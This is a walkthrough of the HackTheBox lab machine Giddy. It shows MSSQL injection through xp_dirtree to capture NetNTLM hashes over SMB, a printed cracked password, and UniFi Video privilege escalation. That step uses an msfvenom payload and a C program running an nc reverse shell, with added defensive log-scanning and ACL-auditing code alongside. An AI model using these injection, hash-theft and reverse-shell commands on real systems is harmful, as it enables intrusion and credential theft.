Port scanning

┌──(mikannse㉿kali)-[~]
└─$ sudo nmap --min-rate=10000 -p- 10.10.10.104
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-07 21:49 CST
Nmap scan report for 10.10.10.104
Host is up (0.081s latency).
Not shown: 65531 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
443/tcp open https
3389/tcp open ms-wbt-server
5985/tcp open wsman
┌──(mikannse㉿kali)-[~]
└─$ sudo nmap -sT -sV -sC -O -p80,443,3389,5985 10.10.10.104
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-07 21:50 CST
Nmap scan report for 10.10.10.104
Host is up (0.22s latency).

PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
443/tcp open ssl/http Microsoft IIS httpd 10.0
|_ssl-date: 2024-09-07T13:41:24+00:00; -10m10s from scanner time.
|_http-server-header: Microsoft-IIS/10.0
| tls-alpn:
| h2
|_ http/1.1
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: IIS Windows Server
| ssl-cert: Subject: commonName=PowerShellWebAccessTestWebSite
| Not valid before: 2018-06-16T21:28:55
|_Not valid after: 2018-09-14T21:28:55
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: GIDDY
| NetBIOS_Domain_Name: GIDDY
| NetBIOS_Computer_Name: GIDDY
| DNS_Domain_Name: Giddy
| DNS_Computer_Name: Giddy
| Product_Version: 10.0.14393
|_ System_Time: 2024-09-07T13:41:14+00:00
|_ssl-date: 2024-09-07T13:41:24+00:00; -10m10s from scanner time.
| ssl-cert: Subject: commonName=Giddy
| Not valid before: 2024-09-06T13:36:08
|_Not valid after: 2025-03-08T13:36:08
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2016 (89%)
OS CPE: cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows Server 2016 (89%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -10m10s, deviation: 0s, median: -10m10s

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 99.65 seconds

MSSQL injection

Ports 80 and 443 serve the same thing: a single image named giddy, which is also the box name and very likely a username.

There is nothing else on the site, so a directory scan turns up /remote and /mvc. /remote is a login page, apparently PowerShell Web Access; getting in should give command execution, but there are no credentials. So on to /mvc, which has registration, login and a search page; registering an account reveals nothing new. Entering a single ' in the search box, however, produces an error

and it leaks the absolute path of Search.aspx:

C:\Users\jnogueira\Downloads\owasp10\1-owasp-top10-m1-injection-exercise-files\before\1-Injection\Search.aspx.cs:30

This looks like the OWASP Top 10 injection exercise???

sqlmap never finishes here, but Product.aspx is also injectable and returns results quickly; the data is not interesting, though, and --os-shell fails because xp_cmdshell is not available.

Here the MSSQL injection is used to make the host connect to an SMB server on our machine, which causes it to send us a NetNTLM hash. The principle is explained in this article:

https://0xdf.gitlab.io/2019/01/13/getting-net-ntlm-hases-from-windows.html

So start an SMB server locally; the curl request below makes the host connect to it:

curl 'http://10.10.10.104/mvc/Product.aspx?ProductSubCategoryId=18;%20EXEC%20master..xp_dirtree%20%22\\vpnip\share%22;%20--'
┌──(mikannse㉿kali)-[~/HTB/giddy]
└─$ impacket-smbserver share .
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.104,49712)
[*] AUTHENTICATE_MESSAGE (GIDDY\Stacy,GIDDY)
[*] User GIDDY\Stacy authenticated successfully
[*] Stacy::GIDDY:aaaaaaaaaaaaaaaa:d13b7d45acd2dcd29343b8eb57ced2d1:010100000000000000dac42a3501db017b36bd2e141f025400000000010010007700510055004a005200620059006300030010007700510055004a0052006200590063000200100052004a00420054004d005100620048000400100052004a00420054004d005100620048000700080000dac42a3501db0106000400020000000800300030000000000000000000000000300000a1db4d82d342e1160e60515b6c8f126040156f78f70c034c988bf33daf6659a20a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e0031003600000000000000000000000000
[*] AUTHENTICATE_MESSAGE (GIDDY\Stacy,GIDDY)
[*] User GIDDY\Stacy authenticated successfully
[*] Stacy::GIDDY:aaaaaaaaaaaaaaaa:497e71dcbd0bb43c6b5fc1b6cd80e378:010100000000000080705d2b3501db013187fbe13414267c00000000010010007700510055004a005200620059006300030010007700510055004a0052006200590063000200100052004a00420054004d005100620048000400100052004a00420054004d005100620048000700080080705d2b3501db0106000400020000000800300030000000000000000000000000300000a1db4d82d342e1160e60515b6c8f126040156f78f70c034c988bf33daf6659a20a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e0031003600000000000000000000000000
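From the defender's side, the request above leaves a clear trace in the IIS logs. This added example (not part of the original writeup) scans constructed W3C-format IIS log lines for the extended stored procedures and UNC paths that make SQL Server authenticate outbound; the log lines, hostnames and IP addresses in them are made up to mirror the request shown.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS W3C log (not a real capture); the second request mirrors the
# Product.aspx injection from the writeup, the last one a similar xp_fileexist probe.
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port c-ip sc-status
2024-09-07 13:40:01 10.10.10.104 GET /mvc/Product.aspx ProductSubCategoryId=18 80 10.10.14.16 200
2024-09-07 13:40:09 10.10.10.104 GET /mvc/Product.aspx ProductSubCategoryId=18;%20EXEC%20master..xp_dirtree%20%22\\\\10.10.14.16\\share%22;%20-- 80 10.10.14.16 200
2024-09-07 13:40:15 10.10.10.104 GET /mvc/Search.aspx Query=%27 80 10.10.14.16 500
2024-09-07 13:41:02 10.10.10.104 GET /mvc/Product.aspx ProductSubCategoryId=18%3B+EXEC+xp_fileexist+%27%5C%5Cattacker%5Cc%24%27 80 10.10.14.16 200
"""

# Extended stored procedures that make SQL Server touch a path (and so authenticate to a UNC host).
XP_PROCS = re.compile(r"\b(xp_dirtree|xp_fileexist|xp_subdirs|xp_cmdshell)\b", re.IGNORECASE)
UNC_PATH = re.compile(r"\\\\([A-Za-z0-9._-]+)\\")           # \\host\share
STACKED = re.compile(r";\s*exec(?:ute)?\b", re.IGNORECASE)  # statement stacking after the parameter


def parse_iis_log(text):
    """Yield one dict per request, keyed by the names in the #Fields header."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            values = line.split(" ")
            if len(values) == len(fields):      # skip malformed lines instead of mis-aligning columns
                yield dict(zip(fields, values))


def scan_iis_log(text):
    """Return the requests whose decoded query string looks like an SMB-coercing injection."""
    findings = []
    for rec in parse_iis_log(text):
        query = unquote_plus(rec.get("cs-uri-query", "-"))   # IIS logs the query URL-encoded
        reasons = []
        if m := XP_PROCS.search(query):
            reasons.append("calls " + m.group(1).lower())
        if u := UNC_PATH.search(query):
            reasons.append("UNC path to " + u.group(1))
        if STACKED.search(query):
            reasons.append("stacked EXEC statement")
        if reasons:
            findings.append({"time": rec["date"] + " " + rec["time"], "client": rec["c-ip"],
                             "uri": rec["cs-uri-stem"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in scan_iis_log(SAMPLE_LOG):
        print(finding)
```

The same rule set can be pointed at a real log directory; the UNC match on its own is already a strong signal, since a legitimate query string has no reason to carry a \\host\share path.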

Brute-force the hash to get the username and password

┌──(mikannse㉿kali)-[~/HTB/giddy]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
xNnWo6272k7x (Stacy)
1g 0:00:00:01 DONE (2024-09-07 22:51) 0.8695g/s 2338Kp/s 2338Kc/s 2338KC/s xamton..x9820x
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.

I wanted to try Remote Desktop on port 3389, but it does not seem to be open? So evil-winrm it is

Privilege escalation

No special privileges, but there is a unifivideo file in the user's Documents folder, which is odd; a quick search shows it is video surveillance software

┌──(mikannse㉿kali)-[~/HTB/giddy]
└─$ searchsploit unifi video
------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------- ---------------------------------
Ubiquiti Networks UniFi Video Default - 'crossdomain.xml' Security | php/webapps/39268.java
Ubiquiti UniFi Video 3.7.3 - Local Privilege Escalation | windows/local/43390.txt
------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

There is a local privilege escalation vulnerability; its description:

Ubiquiti UniFi Video for Windows installs by default to "C:\ProgramData\unifi-video\" and ships with a service named "Ubiquiti UniFi Video". Its executable "avService.exe" is located in the same directory and runs under the NT AUTHORITY/SYSTEM account.

However, the default permissions of the "C:\ProgramData\unifi-video" folder are inherited from "C:\ProgramData" and are not explicitly overridden, which allows all users (even unprivileged ones) to append and write files in the application directory:

When the service starts and stops, it attempts to load and execute a file located at "C:\ProgramData\unifi-video\taskkill.exe". By default, however, this file does not exist in the application directory at all.

By copying an arbitrary "taskkill.exe" into "C:\ProgramData\unifi-video\" as an unprivileged user, it is possible to escalate privileges and execute arbitrary code as NT AUTHORITY/SYSTEM.

Check the registry to get the service name

*Evil-WinRM* PS HKLM:\system\currentcontrolset\services> dir HKLM:\system\currentcontrolset\services | findstr "unifi-video"
ImagePath : C:\ProgramData\unifi-video\avService.exe //RS//UniFiVideoService\
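The root cause in the advisory is an inherited ACL that lets ordinary users create files in the service's directory. This added example (not the writeup's or Ubiquiti's code) audits exactly that from icacls output: it derives the directory from the ImagePath shown above and flags ACEs that give low-privileged principals create or write rights; the icacls text is constructed to reproduce the default C:\ProgramData inheritance the advisory describes, alongside a hardened variant.

```python
import ntpath
import re

IMAGE_PATH = "C:\\ProgramData\\unifi-video\\avService.exe //RS//UniFiVideoService\\"  # from the registry query above

# Constructed icacls output: the ACL C:\ProgramData hands down by default ("(I)" = inherited).
# The last Users ACE grants create-file (WD) and create-folder (AD) on the directory itself.
SAMPLE_ICACLS = r"""C:\ProgramData\unifi-video NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
                           BUILTIN\Administrators:(I)(OI)(CI)(F)
                           CREATOR OWNER:(I)(OI)(CI)(IO)(F)
                           BUILTIN\Users:(I)(OI)(CI)(RX)
                           BUILTIN\Users:(I)(CI)(WD,AD,WEA,WA)
"""
# Constructed output after inheritance is broken and Users are left read/execute only.
HARDENED_ICACLS = r"""C:\ProgramData\unifi-video NT AUTHORITY\SYSTEM:(OI)(CI)(F)
                           BUILTIN\Administrators:(OI)(CI)(F)
                           BUILTIN\Users:(OI)(CI)(RX)
"""

LOW_PRIV = {"BUILTIN\\Users", "NT AUTHORITY\\Authenticated Users", "Everyone", "NT AUTHORITY\\INTERACTIVE"}
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "WA", "WEA"}   # full, modify, write, add file, add subdir, write attrs
ACE_LINE = re.compile(r"^(?:(?P<path>[A-Za-z]:\\\S*)\s+)?(?P<who>[^:()]+):(?P<aces>(?:\([^)]*\))+)$")

def parse_icacls(text):
    """Return (path, principal, flags, rights) per ACE; icacls prints the path only on the first line."""
    entries, path = [], None
    for line in text.splitlines():
        m = ACE_LINE.match(line.strip())
        if m:
            path = m.group("path") or path
            groups = re.findall(r"\(([^)]*)\)", m.group("aces"))      # e.g. ['I', 'CI', 'WD,AD,WEA,WA']
            entries.append((path, m.group("who").strip(), set(groups[:-1]), set(groups[-1].split(","))))
    return entries

def binary_dir(image_path):
    """Directory of the service executable, ignoring quoting and trailing arguments."""
    s = image_path.strip()
    exe = s[1:].split('"', 1)[0] if s.startswith('"') else s.split(" ", 1)[0]
    return ntpath.dirname(exe)

def audit_service_dir(image_path, icacls_text):
    """List ACEs on the binary's directory that let low-privileged principals add or write files."""
    target = binary_dir(image_path)
    weak = []
    for path, who, flags, rights in parse_icacls(icacls_text):
        if (path or "").lower() != target.lower() or "IO" in flags:   # IO = inherit-only, not effective here
            continue
        if who in LOW_PRIV and rights & WRITE_RIGHTS:
            weak.append({"principal": who, "rights": sorted(rights & WRITE_RIGHTS), "inherited": "I" in flags})
    return {"directory": target, "weak_aces": weak}
```

Running the audit over every ImagePath under HKLM:\SYSTEM\CurrentControlSet\Services, with the real icacls output for each directory, surfaces any other service whose binary directory is writable the same way.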

Generate a reverse shell

┌──(mikannse㉿kali)-[~/HTB/giddy]
└─$ sudo msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.16 LPORT=443 -b "\x00" -e x86/shikata_ga_nai -f exe >taskkill.exe

Transfer it to the host via the SMB server

*Evil-WinRM* PS C:\ProgramData\unifi-video> copy \\10.10.14.16\share\taskkill.exe .

However, when I stopped the service I did not get a shell. Running it manually is blocked by AppLocker, and even after moving it to C:\Windows\Tasks and running it there no shell came back; perhaps Defender killed it

But I learned a trick here: write a small C program and compile it into an executable that, when run, uses nc to spawn the reverse shell, since nc is usually not killed

┌──(mikannse㉿kali)-[~/HTB/giddy]
└─$ cat taskkill.c
#include <stdlib.h>

/* Stand-in taskkill.exe: when the service runs it, hand off to nc64.exe
   for the reverse shell (vpnip is the placeholder for the VPN address). */
int main(void)
{
    system("nc64.exe -e cmd.exe vpnip 443");
    return 0;
}
┌──(mikannse㉿kali)-[~/HTB/giddy]
└─$ x86_64-w64-mingw32-gcc taskkill.c -o taskkill.exe
*Evil-WinRM* PS C:\programdata\unifi-video> copy \\10.10.14.16\share\taskkill.exe .
*Evil-WinRM* PS C:\programdata\unifi-video> Stop-Service -Name Unifivideoservice -Force
Warning: Waiting for service 'Ubiquiti UniFi Video (Unifivideoservice)' to stop...
Warning: Waiting for service 'Ubiquiti UniFi Video (Unifivideoservice)' to stop...
Warning: Waiting for service 'Ubiquiti UniFi Video (Unifivideoservice)' to stop...
Warning: Waiting for service 'Ubiquiti UniFi Video (Unifivideoservice)' to stop...
Warning: Waiting for service 'Ubiquiti UniFi Video (Unifivideoservice)' to stop...
Warning: Waiting for service 'Ubiquiti UniFi Video (Unifivideoservice)' to stop...
Warning: Waiting for service 'Ubiquiti UniFi Video (Unifivideoservice)' to stop...
Warning: Waiting for service 'Ubiquiti UniFi Video (Unifivideoservice)' to stop...
Warning: Waiting for service 'Ubiquiti UniFi Video (Unifivideoservice)' to stop...
Warning: Waiting for service 'Ubiquiti UniFi Video (Unifivideoservice)' to stop...
Warning: Waiting for service 'Ubiquiti UniFi Video (Unifivideoservice)' to stop...
Warning: Waiting for service 'Ubiquiti UniFi Video (Unifivideoservice)' to stop...
Warning: Waiting for service 'Ubiquiti UniFi Video (Unifivideoservice)' to stop...
Warning: Waiting for service 'Ubiquiti UniFi Video (Unifivideoservice)' to stop...
Warning: Waiting for service 'Ubiquiti UniFi Video (Unifivideoservice)' to stop...
Warning: Waiting for service 'Ubiquiti UniFi Video (Unifivideoservice)' to stop...
Warning: Waiting for service 'Ubiquiti UniFi Video (Unifivideoservice)' to stop...
Warning: Waiting for service 'Ubiquiti UniFi Video (Unifivideoservice)' to stop...
Warning: Waiting for service 'Ubiquiti UniFi Video (Unifivideoservice)' to stop...
Warning: Waiting for service 'Ubiquiti UniFi Video (Unifivideoservice)' to stop...
Warning: Waiting for service 'Ubiquiti UniFi Video (Unifivideoservice)' to stop...
Warning: Waiting for service 'Ubiquiti UniFi Video (Unifivideoservice)' to stop...
Warning: Waiting for service 'Ubiquiti UniFi Video (Unifivideoservice)' to stop...
Warning: Waiting for service 'Ubiquiti UniFi Video (Unifivideoservice)' to stop...
Warning: Waiting for service 'Ubiquiti UniFi Video (Unifivideoservice)' to stop...
┌──(mikannse㉿kali)-[~/HTB/giddy]
└─$ rlwrap -cAr nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.16] from (UNKNOWN) [10.10.10.104] 49882
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\ProgramData\unifi-video>whoami /all
whoami /all

USER INFORMATION
----------------

User Name SID
=================== ========
nt authority\system S-1-5-18

Afterthoughts

A box with huge takeaways: my first encounter with MSSQL injection, which is a bit different, and using it to steal NetNTLM hashes. For privilege escalation I also learned a new way to abuse a service; it is much like what the Wreath room teaches, but feels more convenient, haha: just build a new executable that uses nc for the reverse shell.